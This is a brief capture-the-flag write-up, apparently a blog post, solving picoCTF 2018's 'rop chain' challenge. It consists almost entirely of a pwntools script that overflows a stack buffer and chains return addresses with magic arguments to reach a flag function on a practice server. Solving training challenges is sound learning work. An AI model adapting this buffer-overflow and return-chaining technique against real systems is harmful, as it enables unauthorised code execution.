pwn | picoctf_2018_rop chain
pwn | picoctf_2018_rop chain
栈溢出ret2text。
exp:
from pwn import *
context.log_level = 'debug'
p_vuln = 0x08048714
p_win1 = 0x080485CB
p_win2 = 0x080485D8
p_flag = 0x0804862B
# p = process('./PicoCTF_2018_rop_chain')
p = remote('node4.buuoj.cn', 26914)
p.recvuntil('input> ')
p.sendline(b'M'*(0x18+4) + p32(p_win1) + p32(p_win2) + p32(p_flag) + p32(0xBAAAAAAD) + p32(0xDEADBAAD))
p.interactive()
本文来自博客园,作者:Mz1,转载请注明原文链接:https://www.cnblogs.com/Mz1-rc/p/17351035.html
如果有问题可以在下方评论或者email:mzi_mzi@163.com